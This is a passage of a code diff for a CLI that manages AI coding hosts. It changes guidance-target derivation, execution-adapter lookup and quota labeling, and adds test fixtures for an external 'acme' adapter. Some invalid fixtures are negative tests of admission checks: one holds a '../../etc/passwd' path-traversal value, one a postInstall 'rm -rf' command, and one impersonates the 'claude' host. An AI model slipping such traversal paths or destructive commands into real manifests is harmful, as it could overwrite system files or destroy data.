+ *  a file it must stay out of. Absent from the file → nothing happens (no write).
+ *
+ *  `knownTargets` (optional) is the full universe of REAL target names — e.g.
+ *  `guidanceTargets().map(t => t.name)`. When supplied, a row is only force-
+ *  stripped when it names at least one target from that universe: it was
+ *  legitimately re-scoped AWAY from `targetName` to some other real target
+ *  (F-17's original migration case — see the dual-mode-reference tests). A row
+ *  whose `guidanceFiles` name NOTHING in `knownTargets` (a typo, or a target no
+ *  currently-registered host produces) is left alone instead of being force-
+ *  stripped from every real file — this module has no basis for treating an
+ *  unrecognized target as "retired from here." Omitting `knownTargets`
+ *  preserves the original unconditional behavior for every existing 2-arg call
+ *  site (status.mjs, nudge.mjs, opencode.mjs — this refactor's edit boundary
+ *  doesn't cover them; only `reconcileGuidance` below opts into the 3-arg
+ *  form). For the registry as it ships today every row's `guidanceFiles` are
+ *  already within the known-target universe, so this is a no-observable-change
+ *  refinement, not a behavior change. */
+export function retiredForTarget(rows, targetName, knownTargets) {
   return rows
-    .filter((r) => !(r.guidanceFiles ?? ['claude']).includes(targetName))
+    .filter((r) => {
+      const files = r.guidanceFiles ?? ['claude'];
+      if (files.includes(targetName)) return false;
+      if (!knownTargets) return true;
+      return files.some((f) => knownTargets.includes(f));
+    })
     .map((r) => ({ ...r, detector: { type: 'retired' } }));
 }
 
-/** The logical guidance targets `sync` (apply) and `status` (dry-run) both loop.
- *  ONE source of truth so the two commands can never drift. Always: machine-wide
- *  `~/.claude/CLAUDE.md` (claude) + the project's own `<cwd>/AGENTS.md` (agents).
- *  The machine-scoped `~/.codex/AGENTS.md` (agents-user) is included ONLY when
- *  `~/.codex` already exists — codex's presence signal — and is NEVER created by
- *  this discovery (dir-exists gate, no mkdir). That single gate covers both cases:
- *  a codex machine that is momentarily single-host still gets the target (so a
- *  stale block can be stripped), and a codex-less machine never grows a ~/.codex.
- *  `~/.config/opencode/AGENTS.md` (agents-opencode) follows the identical rule
- *  (opencode's config home is its presence signal; opencode prefers this file
- *  over ~/.claude/CLAUDE.md, so it needs its own managed copy rather than
- *  inheriting claude's). `cfg` is accepted for call-site symmetry/forward-compat;
- *  the target set is cfg-independent today. `codexRoot`/`opencodeRoot` are test
- *  seams (default to the real dirs).
- *  @param {{ cwd?: string, cfg?: object, codexRoot?: string, opencodeRoot?: string }} opts */
-export function guidanceTargets({ cwd = process.cwd(), codexRoot = codexDir(), opencodeRoot = opencodeDir() } = {}) {
-  const targets = [
-    { name: 'claude', label: 'CLAUDE.md', file: claudeMdPath() },
-    { name: 'agents', label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') },
-  ];
-  if (fs.existsSync(codexRoot)) {
-    targets.push({ name: 'agents-user', label: '~/.codex/AGENTS.md', file: path.join(codexRoot, 'AGENTS.md') });
-  }
-  if (fs.existsSync(opencodeRoot)) {
-    targets.push({ name: 'agents-opencode', label: 'opencode AGENTS.md', file: path.join(opencodeRoot, 'AGENTS.md') });
+/** Per-host guidance-target construction (F-17). Every host in `hosts` that
+ *  declares `capabilities.nativeGuidance` contributes a target named after its
+ *  `legacy.guidanceFile` — the logical name HOST_REGISTRY already carries but
+ *  which nothing consumed before this. Paths/labels/presence-gating stay a
+ *  caller concern (see the module header comment: "Logical names only; paths
+ *  stay a caller concern"), so this module still owns the bespoke mapping for
+ *  the three hosts it knows about:
+ *    - claude → 'claude': machine-wide `~/.claude/CLAUDE.md`, always included.
+ *    - codex  → 'agents': the project's own `<cwd>/AGENTS.md`, always included
+ *      (the AGENTS.md convention is host-neutral, not gated on codex being
+ *      installed). codex ALSO contributes a companion machine-scoped target,
+ *      'agents-user' (`~/.codex/AGENTS.md`) — included only when `~/.codex`
+ *      already exists (codex's presence signal) and NEVER created by this
+ *      discovery (dir-exists gate, no mkdir: a momentarily single-host codex
+ *      machine still gets the target so a stale block can be stripped; a
+ *      codex-less machine never grows a ~/.codex). This companion has no
+ *      `guidanceFile` entry of its own in HOST_REGISTRY — the registry models
+ *      one logical guidance file per host today, and adding a second field is
+ *      outside blocks.mjs's edit boundary — so it stays keyed off the codex
+ *      host id rather than being independently derived.
+ *    - opencode → 'agents-opencode': `~/.config/opencode/AGENTS.md`, included
+ *      only when opencode's config home already exists (identical presence
+ *      rule to agents-user; opencode prefers this file over
+ *      ~/.claude/CLAUDE.md, so it needs its own managed copy).
+ *  A host id this module has no bespoke mapping for still joins the loop (it is
+ *  not silently dropped the way the old hardcoded array would drop it): it gets
+ *  a generic, always-on target named after its own `guidanceFile`. This is what
+ *  makes the list "derived" rather than closed — see the synthetic-host test in
+ *  tests/kit/guidance-targets.test.mjs.
+ *  `cfg` is accepted for call-site symmetry/forward-compat; the target set is
+ *  cfg-independent today. `codexRoot`/`opencodeRoot`/`hosts` are test seams
+ *  (default to the real dirs / the real registry).
+ *  @param {{ cwd?: string, cfg?: object, codexRoot?: string, opencodeRoot?: string, hosts?: Array<any> }} opts */
+export function guidanceTargets({
+  cwd = process.cwd(), codexRoot = codexDir(), opencodeRoot = opencodeDir(), hosts = HOST_REGISTRY,
+} = {}) {
+  const targets = [];
+  for (const host of hosts) {
+    if (!host?.capabilities?.nativeGuidance) continue;
+    const name = host.legacy?.guidanceFile;
+    if (!name) continue;
+    switch (host.id) {
+      case 'claude':
+        targets.push({ name, label: 'CLAUDE.md', file: claudeMdPath() });
+        break;
+      case 'codex':
+        targets.push({ name, label: 'AGENTS.md', file: path.join(cwd, 'AGENTS.md') });
+        if (fs.existsSync(codexRoot)) {
+          targets.push({ name: 'agents-user', label: '~/.codex/AGENTS.md', file: path.join(codexRoot, 'AGENTS.md') });
+        }
+        break;
+      case 'opencode':
+        if (fs.existsSync(opencodeRoot)) {
+          targets.push({ name, label: 'opencode AGENTS.md', file: path.join(opencodeRoot, 'AGENTS.md') });
+        }
+        break;
+      default:
+        // Generic fallback so an unrecognized-but-nativeGuidance host still
+        // joins the reconciliation loop instead of being silently unlooped.
+        // Id-shaped names only: path.join normalizes '..' so a hostile
+        // guidanceFile could escape cwd into a real write primitive
+        // (reconcileGuidance → syncBlocks). A non-conforming name is skipped
+        // entirely — excluded-and-safe beats sanitized-and-surprising.
+        // Schema-level validation of legacy.guidanceFile is the wave-4
+        // admission gate's job, deliberately not duplicated here.
+        if (/^[a-z][a-z0-9-]{0,63}$/.test(name)) {
+          targets.push({ name, label: name, file: path.join(cwd, `${name}.md`) });
+        }
+        break;
+    }
   }
   return targets;
 }
@@ -311,8 +378,10 @@ export async function reconcileGuidance({ cwd, cfg, pkgRoot, context = {}, dryRu
   const rows = registry(cfg.customBlocks);
   const resolve = templateResolver(pkgRoot);
   const out = [];
-  for (const t of guidanceTargets({ cwd, cfg })) {
-    const treg = [...blocksForTarget(rows, t.name), ...retiredForTarget(rows, t.name)];
+  const targets = guidanceTargets({ cwd, cfg });
+  const knownTargets = targets.map((t) => t.name);
+  for (const t of targets) {
+    const treg = [...blocksForTarget(rows, t.name), ...retiredForTarget(rows, t.name, knownTargets)];
     const res = await syncBlocks(t.file, treg, resolve, { context, dryRun });
     const changed = res.filter((r) => r.action !== 'unchanged' && r.action !== 'skipped')
       .map((r) => `${r.slug} ${r.action}`).join(', ');

--- a/src/lib/config.mjs
+++ b/src/lib/config.mjs
@@ -50,6 +50,31 @@ const DEFAULTS = {
 
 const plain = (value) => value !== null && typeof value === 'object' && !Array.isArray(value);
 
+// F-14: kit.json top-level keys this ak version understands, derived from
+// DEFAULTS (the envelope already lists every recognized key, versioned
+// sub-objects included) rather than a second literal that could drift.
+const KNOWN_TOP_LEVEL_KEYS = new Set(Object.keys(DEFAULTS));
+
+// Warn once per process per distinct unknown-key set, not once per load —
+// loadKitConfig runs on nearly every command invocation.
+const warnedUnknownKeySignatures = new Set();
+
+function warnUnknownTopLevelKeys(parsed) {
+  if (!plain(parsed)) return;
+  const unknown = Object.keys(parsed).filter((key) => !KNOWN_TOP_LEVEL_KEYS.has(key));
+  if (unknown.length === 0) return;
+  const signature = [...unknown].sort().join(',');
+  if (warnedUnknownKeySignatures.has(signature)) return;
+  warnedUnknownKeySignatures.add(signature);
+  // Deliberately console.error, not lib/output.mjs's warn() — that helper
+  // writes to stdout (console.log), which would corrupt `--json` consumers
+  // of loadKitConfig. console.error here mirrors the existing stderr-only
+  // warning convention in commands/run.mjs.
+  console.error(
+    `kit.json keys not recognized by this ak version: ${unknown.join(', ')} — preserved, ignored`,
+  );
+}
+
 function assertLoadableEnvelopes(config) {
   if (!plain(config.integrations)) {
     throw new TypeError(
@@ -145,6 +170,7 @@ export function loadKitConfig(file = kitConfigPath()) {
     } catch (error) {
       throw new KitConfigError(cand, error.message, { cause: error });
     }
+    warnUnknownTopLevelKeys(parsed);
     // Migrate raw presence before defaults can masquerade as legacy user intent.
     try {
       return structuredClone(withDefaults(migrateKitConfig(parsed)));

--- a/src/lib/config.mjs
+++ b/src/lib/config.mjs
@@ -46,6 +46,10 @@ const DEFAULTS = {
   statusline: { codex: null }, // {preset,lastProjection}: explicit ownership of Codex [tui] keys
   customBlocks: [],     // [{slug, templatePath, detector:{type:'command'|'dir'|'file', target}}]
   versionCheck: { ttlHours: 24, last: null, seen: {} },
+  // Experimental adapter door (staged behind AK_EXPERIMENTAL_HOST_ADAPTERS=1):
+  // [{name, source, contract}] entries admitted by admission.mjs's
+  // admitAdapters/bootstrapHostAdapters. Empty by default = zero effect.
+  hostAdapters: [],
 };
 
 const plain = (value) => value !== null && typeof value === 'object' && !Array.isArray(value);

--- a/src/lib/dashboard-server.mjs
+++ b/src/lib/dashboard-server.mjs
@@ -687,7 +687,13 @@ export function startDashboard({
   const usageApi = usage || lazyUsage();
   // Injectable like `usage`: tests must never spawn a real codex or read the
   // real ~/.config through this route. Lazy for the same reason lazyUsage is.
-  const provideLimits = limits || (async () => (await import('./quota.mjs')).readLimits());
+  // enabledHosts drives quota.mjs's F-10 labeling (any OTHER enabled host with
+  // no sanctioned quota channel) from the same kit.json read used elsewhere in
+  // this file (see loadKitConfig() below) — never a second, ad hoc source.
+  const provideLimits = limits || (async () => {
+    const { readLimits } = await import('./quota.mjs');
+    return readLimits({ enabledHosts: loadKitConfig().integrations.hosts });
+  });
   const provideLive = typeof live === 'function' ? live : live ? async () => live : lazyLive(liveOptions);
   // Same injection contract as `live`: a function is called to produce the
   // collector, a value is reused verbatim (tests hand over a fake so the route

--- a/src/lib/execution/adapters.mjs
+++ b/src/lib/execution/adapters.mjs
@@ -42,5 +42,12 @@ assertBuiltinAdaptersRoutable();
  *  host with no adapter wired yet — never throws, so callers can degrade a
  *  single worker instead of failing an entire run. */
 export function executionAdapterFor(hostId) {
-  return EXECUTION_ADAPTERS.get(hostId) ?? null;
+  if (EXECUTION_ADAPTERS.has(hostId)) return EXECUTION_ADAPTERS.get(hostId);
+  // Wave 4 (adapter door): an admitted external host whose manifest declares
+  // driving.surfaces including 'cli-subprocess' MAY, in a later wave, get a
+  // constructed execution adapter here. This wave builds none: admitted
+  // hosts have no execution adapter yet, full stop, so they fall through to
+  // the same null return (and the runner's existing cli_unavailable
+  // degradation) as any other routable-but-unadapted host.
+  return null;
 }

--- a/src/lib/execution/adapters.mjs
+++ b/src/lib/execution/adapters.mjs
@@ -11,20 +11,36 @@ export const EXECUTION_ADAPTERS = Object.freeze(new Map([
   ['opencode', OPENCODE_EXECUTION_ADAPTER],
 ]));
 
-// Construction invariant (#88, architecture leg): every routable host needs an
-// execution adapter, and every adapter needs a routable host — enforced at
-// import, exactly like the capability registries' own construction check. A
-// host flipped to canRouteActivities without an adapter (or an adapter added
-// for an unroutable host) would otherwise load cleanly and fail only at
-// runtime with cli_unavailable on every worker — issue #71's trap.
-{
-  const routable = new Set(routableHostIds());
-  const adapted = new Set(EXECUTION_ADAPTERS.keys());
-  const missing = [...routable].filter((id) => !adapted.has(id));
-  const stray = [...adapted].filter((id) => !routable.has(id));
-  if (missing.length || stray.length) {
+// Construction invariant (#88, amended W1-B per ADR-0019's cli_unavailable
+// degradation precedent): only the built-in -> registry direction throws now.
+// A built-in execution adapter wired for a host the registry no longer marks
+// routable is an in-tree wiring mistake — that still throws loudly at import,
+// exactly like before. The reverse used to throw too (a registry host marked
+// routable with no built-in adapter), but that meant any future host flipped
+// to canRouteActivities:true ahead of its adapter landing would brick this
+// module's import for every consumer of `ak run` — the merge-seam gap this
+// wave exists to open. That direction is no longer a construction error:
+// executionAdapterFor() below returns null for it, and the runner degrades
+// just that one worker with cli_unavailable instead of crashing the run
+// (src/lib/execution/runner.mjs's adapterFor already had this fallback for
+// wholly-unknown hosts — a routable-but-unadapted host now takes the same
+// path, never a new one).
+export function assertBuiltinAdaptersRoutable(routableIds = routableHostIds()) {
+  const routable = routableIds instanceof Set ? routableIds : new Set(routableIds);
+  const stray = [...EXECUTION_ADAPTERS.keys()].filter((id) => !routable.has(id));
+  if (stray.length) {
     throw new Error(`execution adapters out of sync with routable hosts: `
-      + `${missing.length ? `no adapter for routable host(s): ${missing.join(', ')}. ` : ''}`
-      + `${stray.length ? `adapter(s) for non-routable host(s): ${stray.join(', ')}` : ''}`.trim());
+      + `adapter(s) for non-routable host(s): ${stray.join(', ')}`);
   }
+}
+
+assertBuiltinAdaptersRoutable();
+
+/** Merge seam (W1-B): resolve one host's execution adapter without exposing
+ *  the underlying Map. Built-ins resolve here today; a later wave admits
+ *  externally-registered adapters into this same lookup. Returns null for a
+ *  host with no adapter wired yet — never throws, so callers can degrade a
+ *  single worker instead of failing an entire run. */
+export function executionAdapterFor(hostId) {
+  return EXECUTION_ADAPTERS.get(hostId) ?? null;
 }

--- a/src/lib/execution/runner.mjs
+++ b/src/lib/execution/runner.mjs
@@ -1,7 +1,7 @@
 // Host-neutral execution coordinator. It owns scheduling, deadlines, and
 // lifecycle cleanup; adapters own each host's transport and protocol details.
 import { validateExecutionAdapter, validateWorkerResult } from './schema.mjs';
-import { EXECUTION_ADAPTERS } from './adapters.mjs';
+import { executionAdapterFor } from './adapters.mjs';
 import {
   HANDOFF_REQUEST,
   normalizeHandoff,
@@ -191,8 +191,18 @@ function validatePlan(plan) {
   }
 }
 
+// W1-B: an omitted `adapters` option resolves through the built-in merge
+// seam (executionAdapterFor) instead of a raw Map reference, so a future
+// externally-admitted adapter joins this same lookup without callers here
+// changing. Explicit injection (tests, callers with their own registry)
+// still takes a Map or plain object, unchanged. Only `undefined` selects the
+// built-in seam: an explicit `null` disables ALL adapters (every worker
+// degrades cli_unavailable) rather than meaning "use defaults" — fail-safe,
+// but don't pass null expecting the built-ins.
 function adapterFor(adapters, host) {
-  const adapter = adapters instanceof Map ? adapters.get(host) : adapters?.[host];
+  const adapter = adapters === undefined
+    ? executionAdapterFor(host)
+    : adapters instanceof Map ? adapters.get(host) : adapters?.[host];
   return adapter ? validateExecutionAdapter(adapter) : null;
 }
 
@@ -265,7 +275,7 @@ async function executeWorkerWithEscalation(worker, adapters, {
  * A failed dependency blocks descendants; independent branches keep running.
  * `escalate: true` enables bounded per-worker ladder retries (ADR-0019). */
 export async function executeRunPlan(plan, {
-  adapters = EXECUTION_ADAPTERS, cwd = process.cwd(), maxConcurrent = 4, timeoutMs, clock = nowIso, escalate = false,
+  adapters, cwd = process.cwd(), maxConcurrent = 4, timeoutMs, clock = nowIso, escalate = false,
 } = /** @type {{adapters?:Record<string, any>|Map<string, any>, cwd?:string, maxConcurrent?:number, timeoutMs?:number, clock?:()=>string, escalate?:boolean}} */ ({})) {
   validatePlan(plan);
   if (!Number.isInteger(maxConcurrent) || maxConcurrent < 1) throw new TypeError('maxConcurrent must be a positive integer');

--- a/src/lib/hosts.mjs
+++ b/src/lib/hosts.mjs
@@ -23,7 +23,7 @@
 //     ~/.codex/auth.json (key overrides login). claude auth on macOS lives in the
 //     Keychain (no readable file); ANTHROPIC_API_KEY, when used, is not a simple
 //     override of a subscription login, so we label it conservatively.
-import { HOST_REGISTRY } from './adapters/index.mjs';
+import { HOST_REGISTRY, effectiveHostRegistry } from './adapters/index.mjs';
 
 /** Per-host adapter descriptors. Logical names (`guidanceFile`, `loginFile`
  *  segments) are resolved to real paths by callers so this stays pure. */
@@ -68,4 +68,76 @@ export function drivingHost(env = process.env, cfg = null) {
   const primaryCapable = HOST_REGISTRY.some((host) => host.id === primary && host.capabilities.canBePrimary);
   if (primary && primaryCapable) return /** @type {'claude'|'codex'} */ (primary);
   return 'claude';
+}
+
+/**
+ * Human phrase for a host's tier, derived purely from its capabilities — never
+ * from `host.id` (the anti-pattern this replaces: x/host.mjs's status() used
+ * to special-case `h.id === 'opencode'` for its tier text; D-2/F-25/F-26).
+ * Accepts a host id (resolved against `registry`, default
+ * effectiveHostRegistry() so an admitted external host resolves too) or a raw
+ * host-entry object directly (for a synthetic host not registered anywhere).
+ * TRUE by construction for any capability combination validateHostAdapter
+ * accepts, including a future built-in or admitted external adapter — the
+ * label follows the flags, not a name.
+ *
+ * @param {string|object} hostIdOrEntry
+ * @param {{ registry?: ReadonlyArray<any>, builtins?: ReadonlyArray<any> }} [opts]
+ * @returns {string} '' when the host isn't found or can't drive a session.
+ */
+export function hostTierLabel(hostIdOrEntry, { registry = effectiveHostRegistry(), builtins = HOST_REGISTRY } = {}) {
+  const host = typeof hostIdOrEntry === 'string'
+    ? registry.find((entry) => entry.id === hostIdOrEntry)
+    : hostIdOrEntry;
+  if (!host?.capabilities?.canDriveSession) return '';
+  const { canBePrimary, canRouteActivities } = host.capabilities;
+
+  if (canBePrimary) return 'drives sessions · can lead';
+  if (!canRouteActivities) return 'drives sessions';
+
+  const isBuiltin = builtins.some((entry) => entry.id === host.id);
+  const base = isBuiltin ? 'routing only · supervised' : 'routing only · external adapter';
+  return host.legacy?.aqeProvider ? base : `${base} · not AQE`;
+}
+
+/**
+ * A one-line, capability/trust-derived note about a host's asymmetric
+ * behavior versus the other managed hosts — cross-host MCP delegation (F-25)
+ * and the ruflo backend env flag / permission consent boundary (F-26) —
+ * assembled only from facts that are true FOR THIS HOST's own registry
+ * entry, never from an id check. '' when nothing asymmetric applies.
+ *
+ * @param {string|object} hostIdOrEntry
+ * @param {{ registry?: ReadonlyArray<any> }} [opts]
+ * @returns {string}
+ */
+export function hostAsymmetryNote(hostIdOrEntry, { registry = effectiveHostRegistry() } = {}) {
+  const host = typeof hostIdOrEntry === 'string'
+    ? registry.find((entry) => entry.id === hostIdOrEntry)
+    : hostIdOrEntry;
+  if (!host?.capabilities?.canDriveSession) return '';
+  const notes = [];
+
+  // F-25: this host is registered as callable FROM another host via MCP — a
+  // real bridge capability, read off the trust manifest rather than an id
+  // check ('expose <label> to <other> as mcp__x__x' is the manifest's own
+  // wording for that grant, e.g. codex's claude-to-codex-mcp change).
+  const bridge = host.trust?.changes?.find((change) =>
+    change.kind === 'mcp-registration' && /^expose /i.test(change.effect));
+  if (bridge) notes.push(bridge.effect);
+
+  // ADR-0019's "supervised-host contract": a host that drives sessions and
+  // routes activities but can never be primary is exactly the shape that
+  // implements a permission consent boundary today (OpenCode's
+  // permission_required abort) — never auto-approved.
+  if (!host.capabilities.canBePrimary && host.capabilities.canRouteActivities) {
+    notes.push('consent boundary — a run can block on a permission event (never auto-approved)');
+  }
+
+  // F-26: ak's ruflo backend env flag (ENABLE_CLAUDE_CODE/ENABLE_CODEX) is
+  // only wired for hosts whose registry entry declares one; silence used to
+  // read as "nothing to say" rather than "no flag exists for this host".
+  if (!host.legacy?.enableEnv) notes.push('no ruflo backend env flag');
+
+  return notes.join('; ');
 }

--- a/src/lib/quota.mjs
+++ b/src/lib/quota.mjs
@@ -18,6 +18,12 @@
 // server-enforced), no Keychain/credentials reads, no chatgpt.com backend
 // endpoints (private; requires bearer-token handling ak must not do).
 //
+// Labeling policy (F-10): any OTHER registry-managed host (adapters/
+// registries.mjs) that the caller reports enabled gets an explicit
+// `{ supported: false }` entry instead of being silently absent — this adds
+// no channel and performs no probe, it only says "no quota surface exists
+// for this host" so a user can tell that apart from "broken".
+//
 // Field-name trap, load-bearing: Codex's `primary`/`secondary` window fields do
 // NOT reliably mean "5-hour"/"weekly" — a live prolite account answered with
 // `primary.windowDurationMins = 10080` (the weekly) and `secondary = null`.
@@ -26,6 +32,7 @@ import fs from 'node:fs';
 import path from 'node:path';
 import { spawn } from 'node:child_process';
 import { configDir } from './paths.mjs';
+import { managedHostIds } from './adapters/registries.mjs';
 
 export const claudeLimitsFile = () => path.join(configDir(), 'claude-rate-limits.json');
 export const codexLimitsFile = () => path.join(configDir(), 'codex-rate-limits.json');
@@ -239,20 +246,45 @@ export async function collectCodexLimits({
   return fresh;
 }
 
+// ── Unsupported hosts (F-10 labeling policy) ────────────────────────────────
+
+/**
+ * Every OTHER registry-managed host (session-driving, per adapters/
+ * registries.mjs `managedHostIds()`) beyond the two ADR-0010-sanctioned
+ * channels, labeled `{ supported: false }` instead of left absent — IF the
+ * caller reports it enabled. A host the caller does not report as enabled is
+ * omitted entirely: a user who never turned it on should see nothing, not a
+ * label. Adds no channel; performs no probe. Pure.
+ *
+ * @param {{ enabledHosts?: Record<string, boolean> }} [o]
+ */
+export function unsupportedQuotaHosts({ enabledHosts = {} } = {}) {
+  return managedHostIds()
+    .filter((id) => id !== 'claude' && id !== 'codex' && enabledHosts[id] === true)
+    .map((provider) => ({ provider, supported: false, reason: 'no quota surface for this host' }));
+}
+
 // ── Combined read (the /api/limits payload) ─────────────────────────────────
 
 /**
  * Both providers, plus the freshness contract the UI renders: `fetchedAt` on
  * each side and `generatedAt` overall. Claude is a pure file read (push
- * model); Codex may spawn one vendor subprocess, TTL-bounded.
+ * model); Codex may spawn one vendor subprocess, TTL-bounded. `others` lists
+ * any additional enabled host with no sanctioned quota channel (F-10);
+ * omitting `enabledHosts` (the default) leaves it empty, so claude/codex
+ * output is unchanged unless a caller opts in.
  *
  * @param {{ now?: number, claudeFile?: string, codexCacheFile?: string, ttlMs?: number,
- *           timeoutMs?: number, spawnImpl?: any, bin?: string }} [o]
+ *           timeoutMs?: number, spawnImpl?: any, bin?: string,
+ *           enabledHosts?: Record<string, boolean> }} [o]
  */
-export async function readLimits({ now = Date.now(), claudeFile, codexCacheFile, ttlMs, timeoutMs, spawnImpl, bin } = {}) {
+export async function readLimits({
+  now = Date.now(), claudeFile, codexCacheFile, ttlMs, timeoutMs, spawnImpl, bin, enabledHosts,
+} = {}) {
   const claude = readClaudeLimits({ file: claudeFile ?? claudeLimitsFile() });
   const codex = await collectCodexLimits({
     ttlMs, cacheFile: codexCacheFile ?? codexLimitsFile(), now, timeoutMs, spawnImpl, bin,
   });
-  return { generatedAt: new Date(now).toISOString(), claude, codex };
+  const others = unsupportedQuotaHosts({ enabledHosts });
+  return { generatedAt: new Date(now).toISOString(), claude, codex, others };
 }

--- a/tests/fixtures/adapters/acme/detect-hook.mjs
+++ b/tests/fixtures/adapters/acme/detect-hook.mjs
@@ -1,0 +1,24 @@
+// Fixture lifecycle hook for the "acme" conformance adapter
+// (tests/kit/adapter-conformance.test.mjs). A real, standalone subprocess —
+// no dependencies, no network, no filesystem writes — invoked exactly as an
+// admitted external adapter's declared hook would be, through the real
+// runAdapterHook. It echoes a 'detect' verb payload shaped per the Adapter
+// Contract Dossier: buildAdmittedLifecycleAdapter (lifecycle-registry.mjs)
+// parses this stdout as JSON and returns it verbatim for 'detect'.
+//
+// ACME_HOOK_FAIL=1 makes the hook fail deliberately, for any future negative
+// test of the hook-execution path itself (unused by the current harness, but
+// kept honest rather than removed since it costs nothing to leave in).
+if (process.env.ACME_HOOK_FAIL === '1') {
+  process.stderr.write('acme fixture hook: deliberate failure\n');
+  process.exit(3);
+}
+
+process.stdout.write(JSON.stringify({
+  observed: {
+    host: 'acme',
+    bin: 'acme',
+    pid: process.pid,
+    argv: process.argv.slice(2),
+  },
+}));

--- a/tests/fixtures/adapters/acme/invalid/can-be-primary.json
+++ b/tests/fixtures/adapters/acme/invalid/can-be-primary.json
@@ -1,0 +1,27 @@
+{
+  "name": "acme-primary",
+  "version": "1.0.0",
+  "contract": 1,
+  "host": {
+    "id": "acme-primary",
+    "label": "Acme CLI (would-be primary)",
+    "install": { "bin": "acme", "externalInstallPolicy": "detect-never-overwrite" },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": true,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "trust": { "approvalPolicy": "unchanged", "changes": [] },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": { "bin": "acme" },
+  "driving": { "surfaces": ["cli-subprocess"] },
+  "trust": { "changes": [] }
+}

--- a/tests/fixtures/adapters/acme/invalid/contract-two.json
+++ b/tests/fixtures/adapters/acme/invalid/contract-two.json
@@ -1,0 +1,27 @@
+{
+  "name": "acme-v2",
+  "version": "1.0.0",
+  "contract": 2,
+  "host": {
+    "id": "acme-v2",
+    "label": "Acme CLI (future contract)",
+    "install": { "bin": "acme", "externalInstallPolicy": "detect-never-overwrite" },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": false,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "trust": { "approvalPolicy": "unchanged", "changes": [] },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": { "bin": "acme" },
+  "driving": { "surfaces": ["cli-subprocess"] },
+  "trust": { "changes": [] }
+}

--- a/tests/fixtures/adapters/acme/invalid/guidance-traversal.json
+++ b/tests/fixtures/adapters/acme/invalid/guidance-traversal.json
@@ -1,0 +1,28 @@
+{
+  "name": "acme-legacy",
+  "version": "1.0.0",
+  "contract": 1,
+  "host": {
+    "id": "acme-legacy",
+    "label": "Acme CLI (legacy claim)",
+    "install": { "bin": "acme", "externalInstallPolicy": "detect-never-overwrite" },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": false,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "legacy": { "guidanceFile": "../../etc/passwd" },
+    "trust": { "approvalPolicy": "unchanged", "changes": [] },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": { "bin": "acme" },
+  "driving": { "surfaces": ["cli-subprocess"] },
+  "trust": { "changes": [] }
+}

--- a/tests/fixtures/adapters/acme/invalid/shadow-claude.json
+++ b/tests/fixtures/adapters/acme/invalid/shadow-claude.json
@@ -1,0 +1,27 @@
+{
+  "name": "claude",
+  "version": "1.0.0",
+  "contract": 1,
+  "host": {
+    "id": "claude",
+    "label": "Definitely Not Claude",
+    "install": { "bin": "acme", "externalInstallPolicy": "detect-never-overwrite" },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": false,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "trust": { "approvalPolicy": "unchanged", "changes": [] },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": { "bin": "acme" },
+  "driving": { "surfaces": ["cli-subprocess"] },
+  "trust": { "changes": [] }
+}

--- a/tests/fixtures/adapters/acme/manifest-with-extraneous-field.json
+++ b/tests/fixtures/adapters/acme/manifest-with-extraneous-field.json
@@ -1,0 +1,74 @@
+{
+  "name": "acme",
+  "version": "1.0.0",
+  "contract": 1,
+  "host": {
+    "id": "acme",
+    "label": "Acme CLI",
+    "install": {
+      "bin": "acme",
+      "externalInstallPolicy": "detect-never-overwrite"
+    },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": false,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "trust": {
+      "approvalPolicy": "unchanged",
+      "changes": []
+    },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": {
+    "bin": "acme",
+    "versionArgs": [
+      "--version"
+    ],
+    "versionPattern": "\\d+\\.\\d+\\.\\d+"
+  },
+  "driving": {
+    "surfaces": [
+      "cli-subprocess"
+    ]
+  },
+  "lifecycle": {
+    "detect": {
+      "hook": {
+        "command": [
+          "node",
+          "detect-hook.mjs"
+        ],
+        "timeoutMs": 5000
+      }
+    }
+  },
+  "trust": {
+    "changes": [
+      {
+        "id": "acme-subprocess-hooks",
+        "kind": "third-party-adapter",
+        "scope": "project",
+        "owner": "acme",
+        "value": "subprocess hooks",
+        "effect": "run consented lifecycle hooks for acme"
+      }
+    ]
+  },
+  "postInstall": {
+    "command": [
+      "definitely-not-real",
+      "rm",
+      "-rf",
+      "whatever"
+    ],
+    "note": "a schema-unknown top-level field"
+  }
+}

--- a/tests/fixtures/adapters/acme/manifest.json
+++ b/tests/fixtures/adapters/acme/manifest.json
@@ -1,0 +1,47 @@
+{
+  "name": "acme",
+  "version": "1.0.0",
+  "contract": 1,
+  "host": {
+    "id": "acme",
+    "label": "Acme CLI",
+    "install": { "bin": "acme", "externalInstallPolicy": "detect-never-overwrite" },
+    "capabilities": {
+      "canDriveSession": false,
+      "canBePrimary": false,
+      "canRouteActivities": false,
+      "commandStatusline": false,
+      "transcripts": false,
+      "usage": false,
+      "nativeMcpConfig": false,
+      "nativeGuidance": false
+    },
+    "trust": { "approvalPolicy": "unchanged", "changes": [] },
+    "enabledByDefault": false,
+    "configProjection": "ruflo",
+    "observability": []
+  },
+  "detection": {
+    "bin": "acme",
+    "versionArgs": ["--version"],
+    "versionPattern": "\\d+\\.\\d+\\.\\d+"
+  },
